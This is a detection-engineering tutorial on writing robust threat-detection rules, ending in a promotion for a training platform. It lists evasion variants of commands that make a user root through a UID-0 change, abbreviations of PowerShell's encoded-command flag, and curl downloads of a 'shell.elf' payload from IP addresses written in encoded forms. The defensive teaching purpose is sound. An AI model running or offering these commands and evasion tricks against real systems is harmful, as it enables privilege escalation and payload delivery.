How to Write Threat Detection Rules That Actually Work

In a modern security defense stack, Detection Engineering is a critical capability. For many new security analysts, writing detection rules can look deceptively simple: “Isn’t it just a few regexes and keyword matches?”

Once you dig in, you’ll realize that most rules are full of bypassable assumptions. A rule that looks perfect can break completely if an attacker changes the parameter order, uses an abbreviation, or even adds a single space.

In real-world adversarial scenarios, this kind of string-based detection is extremely fragile. Attackers exploit the flexibility built into operating systems and tools to generate payloads that behave the same but look different, and static rules miss them. A competent detection engineer needs a deep understanding of attacker techniques and must balance two goals at once: covering variants reliably and keeping false positives low for legitimate activity.

This article walks through several practical examples to highlight common traps in detection rule writing and how to build more robust detection logic.

1. Parameter Order and Format Diversity

In Linux persistence scenarios, an attacker can use `usermod` to change a normal user’s UID to 0. Since UID 0 identifies the root account, the modified user effectively gains full root privileges—while still appearing as a normal username. This stealthy privilege escalation is easy to miss during routine admin checks.

Example attack command:

usermod -u 0 -o testuser

A common beginner approach is to match the command string directly:

process_name = "usermod" AND command_line CONTAINS "-u 0 -o"

This looks reasonable, but it has major blind spots. With minimal knowledge of `usermod`, you’ll notice many equivalent variants achieve the same result while bypassing the rule:

# 1: Swap parameter order
usermod -o -u 0 testuser

# 2: Use long options
usermod --uid 0 --non-unique testuser

# 3: Mix long and short options
usermod --uid 0 -o testuser

# 4: Use equals assignment
usermod -o --uid=0 testuser

# 5: No space between -u and 0
usermod -u0 -o testuser 

# 6: Move the username position
usermod testuser -u 0 -o

Linux argument parsing (e.g., `getopt`) typically supports order-independent options, long/short equivalence (`-u` vs `--uid`), multiple assignment formats (space or `=`), and compact forms like `-u0`. In other words, one command can have dozens of valid spellings. Simple string matching will inevitably miss cases.
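To see why these spellings are equivalent, it can help to run them through a getopt-style parser. The sketch below uses Python's standard `getopt.gnu_getopt` as a stand-in for the C parser. The option table is an assumed two-option subset of `usermod`, and `parsed_uid` is a hypothetical helper name.

```python
import getopt
import shlex

# Assumed subset of usermod's options, for illustration only.
SHORT_OPTS = "u:o"                   # -u takes a value, -o does not
LONG_OPTS = ["uid=", "non-unique"]   # --uid takes a value

VARIANTS = [
    "usermod -u 0 -o testuser",
    "usermod -o -u 0 testuser",
    "usermod --uid 0 --non-unique testuser",
    "usermod --uid 0 -o testuser",
    "usermod -o --uid=0 testuser",
    "usermod -u0 -o testuser",
    "usermod testuser -u 0 -o",
]


def parsed_uid(command_line):
    """Return the UID requested on the command line, or None if absent."""
    argv = shlex.split(command_line)[1:]  # drop the program name
    opts, _positional = getopt.gnu_getopt(argv, SHORT_OPTS, LONG_OPTS)
    for name, value in opts:
        if name in ("-u", "--uid"):
            return int(value)
    return None


for cmd in VARIANTS:
    print(parsed_uid(cmd), "<-", cmd)
```

Every spelling reduces to the same parsed value, which is the property a robust rule has to approximate when it only sees the raw string.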

A better approach is to target the invariant core of the behavior. No matter how the attacker rewrites it, this privilege escalation must include three elements: the `usermod` binary, a UID option (`-u` or `--uid`), and the value `0`. With that, a single regex can cover the major variants:

process_name = "usermod" 
AND command_line REGEX "(-u\s*0\b|--uid[=\s]+0\b)"

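This regex matches either `-u` followed by `0` (with optional whitespace) or `--uid` followed by `0` via space or `=`. Because the pattern is unanchored, it matches wherever the option appears in the command line, which takes care of parameter order. It is still a baseline rather than a complete answer: getopt-style parsers generally also accept bundled short options such as `-ou 0`, which this pattern does not match, so test the rule against further variants and extend it as needed.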
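One way to check a rule like this is a small test harness. The sketch below copies the pattern from the rule and runs it against the variants listed earlier, two benign commands, and one bundled-option spelling used as a probe. The benign samples and the probe are assumptions added for illustration.

```python
import re

# Pattern copied from the rule above.
UID_ZERO = re.compile(r"(-u\s*0\b|--uid[=\s]+0\b)")

SHOULD_MATCH = [
    "usermod -u 0 -o testuser",
    "usermod -o -u 0 testuser",
    "usermod --uid 0 --non-unique testuser",
    "usermod --uid 0 -o testuser",
    "usermod -o --uid=0 testuser",
    "usermod -u0 -o testuser",
    "usermod testuser -u 0 -o",
]

# Assumed benign samples: a non-zero UID change and a group change.
SHOULD_NOT_MATCH = [
    "usermod -u 1001 testuser",
    "usermod -aG sudo testuser",
]

# Probe: short options bundled getopt-style (-o and -u share one dash).
KNOWN_GAP = "usermod -ou 0 testuser"


def matches(command_line):
    return UID_ZERO.search(command_line) is not None


for cmd in SHOULD_MATCH + SHOULD_NOT_MATCH + [KNOWN_GAP]:
    print("HIT " if matches(cmd) else "MISS", cmd)
```

The probe comes back as a miss, which shows that even a reasonable regex benefits from being exercised against spellings its author did not think of.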

2. Parameter Variants and Aliases

On Windows, PowerShell is both an attacker favorite and a defender’s headache. To hide malicious code, attackers often pass commands to it as Base64-encoded strings.

The most standard form is: `powershell.exe -EncodedCommand <Base64String>`

A beginner rule often looks like this:

process_name = "powershell.exe" AND command_line CONTAINS "-EncodedCommand"

That’s far from sufficient. PowerShell is intentionally flexible: parameters support prefix matching (any unique prefix works), are case-insensitive, and accept either `-` or `/` as the option prefix. As a result, `-EncodedCommand` can be shortened to many equivalent forms, all valid:

powershell -EncodedCommand SQBFAFgA...   # full parameter
powershell -EncodedComman SQBFAFgA...    # minus 1 letter
powershell -EncodedComma SQBFAFgA...     # minus 2 letters
powershell -EncodedComm SQBFAFgA...      # minus 3 letters
powershell -EncodedCom SQBFAFgA...       # minus 4 letters
powershell -EncodedCo SQBFAFgA...        # minus 5 letters
powershell -EncodedC SQBFAFgA...         # minus 6 letters
powershell -Encoded SQBFAFgA...          # minus 7 letters
powershell -Encode SQBFAFgA...           # minus 8 letters
powershell -Encod SQBFAFgA...            # minus 9 letters
powershell -Enco SQBFAFgA...             # minus 10 letters
powershell -Enc SQBFAFgA...              # minus 11 letters
powershell -En SQBFAFgA...               # minus 12 letters
powershell -E SQBFAFgA...                # shortest form
powershell /enc SQBFAFgA...              # slash prefix
powershell -ec SQBFAFgA...               # “skipping” abbreviation

To cover these variants, the rule should match multiple executable names and use regex to handle the full range of option spellings:

process_name REGEX "(?i)(powershell|pwsh)(\.exe)?$"
AND command_line REGEX "(?i)[\s][-/](e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedco|encodedcom|encodedcomm|encodedcomma|encodedcomman|encodedcommand)[\s]"

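This regex enumerates valid prefixes from the shortest form to the full parameter name. `(?i)` enables case-insensitive matching, and `[-/]` matches both `-` and `/`. The whitespace required on both sides keeps a short prefix such as `-e` from matching inside a longer, unrelated option like `-ExecutionPolicy`.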
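Typing fifteen alternatives by hand is error-prone, so the list can be generated instead. The sketch below builds the same alternation from the parameter name plus the `ec` alias and checks it against a few of the spellings above. `has_encoded_flag` is a hypothetical helper name and the benign command lines are assumed samples.

```python
import re

PARAM = "encodedcommand"

# Every leading prefix of the parameter name, plus the special "ec" alias.
PREFIXES = [PARAM[:n] for n in range(1, len(PARAM) + 1)] + ["ec"]

# Same shape as the rule above: whitespace, - or /, a prefix, whitespace.
ENC_FLAG = re.compile(r"(?i)\s[-/](?:" + "|".join(PREFIXES) + r")\s")


def has_encoded_flag(command_line):
    return ENC_FLAG.search(command_line) is not None


ENCODED = [
    "powershell -EncodedCommand SQBFAFgA...",
    "powershell -Enc SQBFAFgA...",
    "powershell -E SQBFAFgA...",
    "powershell /enc SQBFAFgA...",
    "powershell -ec SQBFAFgA...",
    "powershell -eNcO SQBFAFgA...",  # mixed case
]

# Assumed benign samples that start with similar letters.
BENIGN = [
    "powershell -ExecutionPolicy Bypass -File script.ps1",
    "powershell -NoProfile -Command Get-Date",
]

for cmd in ENCODED + BENIGN:
    print("HIT " if has_encoded_flag(cmd) else "MISS", cmd)
```

Generating the list keeps the rule in sync with the parameter name and makes it easy to repeat the exercise for other abbreviable options.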

3. Data Encoding and Equivalent Representations

In many environments, legitimate services are typically accessed via domain names. Directly requesting an IP address can be suspicious. Suppose your detection team wants to flag `curl` requests that target an IP address rather than a domain. A beginner might write:

process_name = "curl"
AND command_line REGEX "\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}"

This matches standard dotted-decimal IP addresses and seems reasonable. The issue is that common address parsers accept multiple equivalent IP representations. Apart from the first, baseline example, every command below reaches `192.168.1.100` (the last one targets `10.0.0.1` instead), yet none of them matches the dotted-decimal regex:

# Standard dotted decimal (will be detected)
curl http://192.168.1.100/shell.elf

# Hex format
curl http://0xC0.0xA8.0x1.0x64/shell.elf

# Octal format
curl http://0300.0250.01.0144/shell.elf

# Decimal integer format
curl http://3232235876/shell.elf

# Mixed-base format
curl http://0xC0.168.0x1.100/shell.elf

# Omit middle octets (example uses 10.0.0.1)
curl http://10.1/shell.elf

To a human, these barely look like IP addresses, but the address-parsing routines that many tools rely on (classically `inet_aton`) accept them and connect to the same host. A rule that only covers dotted-decimal will fail against these variants.
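The arithmetic behind these forms is simple. The sketch below is an illustrative re-implementation of the classic `inet_aton` conventions, not the OS code itself: one to four dot-separated parts, each in decimal, octal (leading `0`), or hex (leading `0x`), with the last part filling all remaining bytes. `normalize_ipv4` is a hypothetical helper name.

```python
def normalize_ipv4(text):
    """Convert a loosely written IPv4 literal to dotted decimal."""
    parts = text.split(".")
    if not 1 <= len(parts) <= 4:
        raise ValueError(f"not an IPv4 literal: {text!r}")

    numbers = []
    for part in parts:
        if part.lower().startswith("0x"):
            numbers.append(int(part, 16))   # hex part
        elif len(part) > 1 and part.startswith("0"):
            numbers.append(int(part, 8))    # octal part
        else:
            numbers.append(int(part, 10))   # decimal part

    *leading, last = numbers
    # Leading parts are one byte each; the last part fills the rest.
    if any(not 0 <= n <= 255 for n in leading):
        raise ValueError(f"part out of range: {text!r}")
    if not 0 <= last < 256 ** (4 - len(leading)):
        raise ValueError(f"part out of range: {text!r}")

    value = last
    for index, n in enumerate(leading):
        value |= n << (8 * (3 - index))
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


for host in ["192.168.1.100", "0xC0.0xA8.0x1.0x64", "0300.0250.01.0144",
             "3232235876", "0xC0.168.0x1.100", "10.1"]:
    print(host, "->", normalize_ipv4(host))
```

Normalizing hosts this way before matching is one option, although it only helps if the detection pipeline allows custom parsing on the command line.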

Exhaustively capturing every representation with regex is close to impossible. Instead, change the strategy: if the goal is to detect “using an IP instead of a domain,” think in reverse—match all `curl` requests, then exclude those whose targets match normal domain-name patterns. What remains are the potentially suspicious cases. This “exclude normal” approach often scales better than trying to enumerate every “abnormal” encoding trick.
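A minimal sketch of the "exclude normal" idea follows. It assumes that a normal target is a dot-separated hostname ending in an alphabetic TLD, and that the URL is written with an explicit scheme. Both are simplifications: single-label names such as `localhost` and punycode TLDs would be flagged, and scheme-less URLs are skipped. `DOMAIN_RE` and `suspicious_hosts` are hypothetical names.

```python
import re
import shlex
from urllib.parse import urlsplit

# Assumed definition of "normal": labels separated by dots, alphabetic TLD.
DOMAIN_RE = re.compile(
    r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$"
)


def suspicious_hosts(command_line):
    """Return URL hosts in a curl command that do not look like domains."""
    flagged = []
    for token in shlex.split(command_line):
        if "://" not in token:
            continue  # simplification: only URLs with an explicit scheme
        host = urlsplit(token).hostname or ""
        if not DOMAIN_RE.match(host):
            flagged.append(host)
    return flagged


SAMPLES = [
    "curl http://192.168.1.100/shell.elf",
    "curl http://0xC0.0xA8.0x1.0x64/shell.elf",
    "curl http://0300.0250.01.0144/shell.elf",
    "curl http://3232235876/shell.elf",
    "curl http://10.1/shell.elf",
    "curl -s https://example.com/install.sh",
]

for cmd in SAMPLES:
    print(suspicious_hosts(cmd) or "ok", "<-", cmd)
```

The allow pattern is short and stable, while the set of things it rejects grows automatically as attackers invent new encodings. The cost is that the definition of "normal" has to be tuned to the environment.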

Summary

Across these three examples, the same challenge keeps showing up: the flexibility that operating systems and tools provide for usability becomes an attacker’s bypass mechanism. Options can be reordered, shortened, or expressed in different formats—equivalent to the program, but completely different strings to a text-matching rule.

To write robust detection rules, focus on three principles: (1) capture the invariant behavior, not a single literal spelling; (2) use regex for pattern matching to cover known variants; (3) when enumeration is impractical, consider a reverse strategy—exclude normal rather than exhaustively listing abnormal.

Still, there’s always a gap between theory and real-world effectiveness. After you write a rule, how do you validate that it covers enough bypass variants? And how do you ensure it won’t generate noisy false positives in production? These questions are hard to answer with reasoning alone.

That’s why we built the SOCLabs platform. SOCLabs focuses on threat detection learning and hands-on training. Each detection challenge includes a large set of realistic bypass techniques and obfuscated variants to evaluate how resilient your rules really are. The platform also includes extensive benign “background noise” data—drawn from real-world cases by experienced detection engineers—to help you improve detection coverage while keeping false positives under control.

Detection engineering has no one-time silver bullet. It’s a continuous adversarial game. If you want to sharpen your detection skills in realistic scenarios, visit SOCLabs and grow into a stronger detection engineer through hands-on practice.